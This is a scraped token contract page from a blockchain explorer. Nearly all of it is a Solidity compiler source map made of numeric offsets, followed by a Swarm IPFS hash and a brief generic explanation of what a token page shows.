:::o;3019:90::-;3053:7;3096:5;3089:13;3082:21;3071:32;;3019:90;;;:::o;3115:109::-;3196:21;3211:5;3196:21;:::i;:::-;3191:3;3184:34;3115:109;;:::o;3230:210::-;3317:4;3355:2;3344:9;3340:18;3332:26;;3368:65;3430:1;3419:9;3415:17;3406:6;3368:65;:::i;:::-;3230:210;;;;:::o;3446:118::-;3533:24;3551:5;3533:24;:::i;:::-;3528:3;3521:37;3446:118;;:::o;3570:222::-;3663:4;3701:2;3690:9;3686:18;3678:26;;3714:71;3782:1;3771:9;3767:17;3758:6;3714:71;:::i;:::-;3570:222;;;;:::o;3798:619::-;3875:6;3883;3891;3940:2;3928:9;3919:7;3915:23;3911:32;3908:119;;;3946:79;;:::i;:::-;3908:119;4066:1;4091:53;4136:7;4127:6;4116:9;4112:22;4091:53;:::i;:::-;4081:63;;4037:117;4193:2;4219:53;4264:7;4255:6;4244:9;4240:22;4219:53;:::i;:::-;4209:63;;4164:118;4321:2;4347:53;4392:7;4383:6;4372:9;4368:22;4347:53;:::i;:::-;4337:63;;4292:118;3798:619;;;;;:::o;4423:86::-;4458:7;4498:4;4491:5;4487:16;4476:27;;4423:86;;;:::o;4515:112::-;4598:22;4614:5;4598:22;:::i;:::-;4593:3;4586:35;4515:112;;:::o;4633:214::-;4722:4;4760:2;4749:9;4745:18;4737:26;;4773:67;4837:1;4826:9;4822:17;4813:6;4773:67;:::i;:::-;4633:214;;;;:::o;4853:329::-;4912:6;4961:2;4949:9;4940:7;4936:23;4932:32;4929:119;;;4967:79;;:::i;:::-;4929:119;5087:1;5112:53;5157:7;5148:6;5137:9;5133:22;5112:53;:::i;:::-;5102:63;;5058:117;4853:329;;;;:::o;5188:117::-;5297:1;5294;5287:12;5311:117;5420:1;5417;5410:12;5434:117;5543:1;5540;5533:12;5574:568;5647:8;5657:6;5707:3;5700:4;5692:6;5688:17;5684:27;5674:122;;5715:79;;:::i;:::-;5674:122;5828:6;5815:20;5805:30;;5858:18;5850:6;5847:30;5844:117;;;5880:79;;:::i;:::-;5844:117;5994:4;5986:6;5982:17;5970:29;;6048:3;6040:4;6032:6;6028:17;6018:8;6014:32;6011:41;6008:128;;;6055:79;;:::i;:::-;6008:128;5574:568;;;;;:::o;6148:704::-;6243:6;6251;6259;6308:2;6296:9;6287:7;6283:23;6279:32;6276:119;;;6314:79;;:::i;:::-;6276:119;6462:1;6451:9;6447:17;6434:31;6492:18;6484:6;6481:30;6478:117;;;6514:79;;:::i;:::-;6478:117;6627:80;6699:7;6690:6;6679:9;6675:22;6627:80;:::i;:::-;6609:98;;;;6405:312;6756:2;6782:53;6827:7;6818:6;6807:9;6803:22;6782:53;:::i;:::-;6772:63;;6727:118;6148:704;;;;;:::o;6858:118::-;6945:24;6963:5;6945:24;:::i;:::-;6940:3;6933:37;6858:118;;:::o;6982:222::-;7075:4;7113:2;7102:9;7098:18;7090:26;;7126:71;7194:1;7183:9;7179:17;7170:6;7126:71;:::i;:::-;6982:222;;;;:::o;7210:474::-;7278:6;7286;7335:2;7323:9;7314:7;7310:23;7306:32;7303:119;;;7341:79;;:::i;:::-;7303:119;7461:1;7486:53;7531:7;7522:6;7511:9;7507:22;7486:53;:::i;:::-;7476:63;;7432:117;7588:2;7614:53;7659:7;7650:6;7639:9;7635:22;7614:53;:::i;:::-;7604:63;;7559:118;7210:474;;;;;:::o;7690:180::-;7738:77;7735:1;7728:88;7835:4;7832:1;7825:15;7859:4;7856:1;7849:15;7876:320;7920:6;7957:1;7951:4;7947:12;7937:22;;8004:1;7998:4;7994:12;8025:18;8015:81;;8081:4;8073:6;8069:17;8059:27;;8015:81;8143:2;8135:6;8132:14;8112:18;8109:38;8106:84;;8162:18;;:::i;:::-;8106:84;7927:269;7876:320;;;:::o;8202:180::-;8250:77;8247:1;8240:88;8347:4;8344:1;8337:15;8371:4;8368:1;8361:15;8388:191;8428:3;8447:20;8465:1;8447:20;:::i;:::-;8442:25;;8481:20;8499:1;8481:20;:::i;:::-;8476:25;;8524:1;8521;8517:9;8510:16;;8545:3;8542:1;8539:10;8536:36;;;8552:18;;:::i;:::-;8536:36;8388:191;;;;:::o;8585:180::-;8633:77;8630:1;8623:88;8730:4;8727:1;8720:15;8754:4;8751:1;8744:15;8771:233;8810:3;8833:24;8851:5;8833:24;:::i;:::-;8824:33;;8879:66;8872:5;8869:77;8866:103;;8949:18;;:::i;:::-;8866:103;8996:1;8989:5;8985:13;8978:20;;8771:233;;;:::o;9010:224::-;9150:34;9146:1;9138:6;9134:14;9127:58;9219:7;9214:2;9206:6;9202:15;9195:32;9010:224;:::o;9240:366::-;9382:3;9403:67;9467:2;9462:3;9403:67;:::i;:::-;9396:74;;9479:93;9568:3;9479:93;:::i;:::-;9597:2;9592:3;9588:12;9581:19;;9240:366;;;:::o;9612:419::-;9778:4;9816:2;9805:9;9801:18;9793:26;;9865:9;9859:4;9855:20;9851:1;9840:9;9836:17;9829:47;9893:131;10019:4;9893:131;:::i;:::-;9885:139;;9612:419;;;:::o;10037:225::-;10177:34;10173:1;10165:6;10161:14;10154:58;10246:8;10241:2;10233:6;10229:15;10222:33;10037:225;:::o;10268:366::-;10410:3;10431:67;10495:2;10490:3;10431:67;:::i;:::-;10424:74;;10507:93;10596:3;10507:93;:::i;:::-;10625:2;10620:3;10616:12;10609:19;;10268:366;;;:::o;10640:419::-;10806:4;10844:2;10833:9;10829:18;10821:26;;10893:9;10887:4;10883:20;10879:1;10868:9;10864:17;10857:47;10921:131;11047:4;10921:131;:::i;:::-;10913:139;;10640:419;;;:::o;11065:223::-;11205:34;11201:1;11193:6;11189:14;11182:58;11274:6;11269:2;11261:6;11257:15;11250:31;11065:223;:::o;11294:366::-;11436:3;11457:67;11521:2;11516:3;11457:67;:::i;:::-;11450:74;;11533:93;11622:3;11533:93;:::i;:::-;11651:2;11646:3;11642:12;11635:19;;11294:366;;;:::o;11666:419::-;11832:4;11870:2;11859:9;11855:18;11847:26;;11919:9;11913:4;11909:20;11905:1;11894:9;11890:17;11883:47;11947:131;12073:4;11947:131;:::i;:::-;11939:139;;11666:419;;;:::o;12091:221::-;12231:34;12227:1;12219:6;12215:14;12208:58;12300:4;12295:2;12287:6;12283:15;12276:29;12091:221;:::o;12318:366::-;12460:3;12481:67;12545:2;12540:3;12481:67;:::i;:::-;12474:74;;12557:93;12646:3;12557:93;:::i;:::-;12675:2;12670:3;12666:12;12659:19;;12318:366;;;:::o;12690:419::-;12856:4;12894:2;12883:9;12879:18;12871:26;;12943:9;12937:4;12933:20;12929:1;12918:9;12914:17;12907:47;12971:131;13097:4;12971:131;:::i;:::-;12963:139;;12690:419;;;:::o;13115:179::-;13255:31;13251:1;13243:6;13239:14;13232:55;13115:179;:::o;13300:366::-;13442:3;13463:67;13527:2;13522:3;13463:67;:::i;:::-;13456:74;;13539:93;13628:3;13539:93;:::i;:::-;13657:2;13652:3;13648:12;13641:19;;13300:366;;;:::o;13672:419::-;13838:4;13876:2;13865:9;13861:18;13853:26;;13925:9;13919:4;13915:20;13911:1;13900:9;13896:17;13889:47;13953:131;14079:4;13953:131;:::i;:::-;13945:139;;13672:419;;;:::o;14097:224::-;14237:34;14233:1;14225:6;14221:14;14214:58;14306:7;14301:2;14293:6;14289:15;14282:32;14097:224;:::o;14327:366::-;14469:3;14490:67;14554:2;14549:3;14490:67;:::i;:::-;14483:74;;14566:93;14655:3;14566:93;:::i;:::-;14684:2;14679:3;14675:12;14668:19;;14327:366;;;:::o;14699:419::-;14865:4;14903:2;14892:9;14888:18;14880:26;;14952:9;14946:4;14942:20;14938:1;14927:9;14923:17;14916:47;14980:131;15106:4;14980:131;:::i;:::-;14972:139;;14699:419;;;:::o;15124:222::-;15264:34;15260:1;15252:6;15248:14;15241:58;15333:5;15328:2;15320:6;15316:15;15309:30;15124:222;:::o;15352:366::-;15494:3;15515:67;15579:2;15574:3;15515:67;:::i;:::-;15508:74;;15591:93;15680:3;15591:93;:::i;:::-;15709:2;15704:3;15700:12;15693:19;;15352:366;;;:::o;15724:419::-;15890:4;15928:2;15917:9;15913:18;15905:26;;15977:9;15971:4;15967:20;15963:1;15952:9;15948:17;15941:47;16005:131;16131:4;16005:131;:::i;:::-;15997:139;;15724:419;;;:::o;16149:225::-;16289:34;16285:1;16277:6;16273:14;16266:58;16358:8;16353:2;16345:6;16341:15;16334:33;16149:225;:::o;16380:366::-;16522:3;16543:67;16607:2;16602:3;16543:67;:::i;:::-;16536:74;;16619:93;16708:3;16619:93;:::i;:::-;16737:2;16732:3;16728:12;16721:19;;16380:366;;;:::o;16752:419::-;16918:4;16956:2;16945:9;16941:18;16933:26;;17005:9;16999:4;16995:20;16991:1;16980:9;16976:17;16969:47;17033:131;17159:4;17033:131;:::i;:::-;17025:139;;16752:419;;;:::o;17177:182::-;17317:34;17313:1;17305:6;17301:14;17294:58;17177:182;:::o;17365:366::-;17507:3;17528:67;17592:2;17587:3;17528:67;:::i;:::-;17521:74;;17604:93;17693:3;17604:93;:::i;:::-;17722:2;17717:3;17713:12;17706:19;;17365:366;;;:::o;17737:419::-;17903:4;17941:2;17930:9;17926:18;17918:26;;17990:9;17984:4;17980:20;17976:1;17965:9;17961:17;17954:47;18018:131;18144:4;18018:131;:::i;:::-;18010:139;;17737:419;;;:::o;18162:348::-;18202:7;18225:20;18243:1;18225:20;:::i;:::-;18220:25;;18259:20;18277:1;18259:20;:::i;:::-;18254:25;;18447:1;18379:66;18375:74;18372:1;18369:81;18364:1;18357:9;18350:17;18346:105;18343:131;;;18454:18;;:::i;:::-;18343:131;18502:1;18499;18495:9;18484:20;;18162:348;;;;:::o;18516:180::-;18564:77;18561:1;18554:88;18661:4;18658:1;18651:15;18685:4;18682:1;18675:15;18702:185;18742:1;18759:20;18777:1;18759:20;:::i;:::-;18754:25;;18793:20;18811:1;18793:20;:::i;:::-;18788:25;;18832:1;18822:35;;18837:18;;:::i;:::-;18822:35;18879:1;18876;18872:9;18867:14;;18702:185;;;;:::o

Swarm Source

ipfs://be0ef239898cc9ccf9a35eac82b64efab9d63bbb8e6174aae04247e9f133061c
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.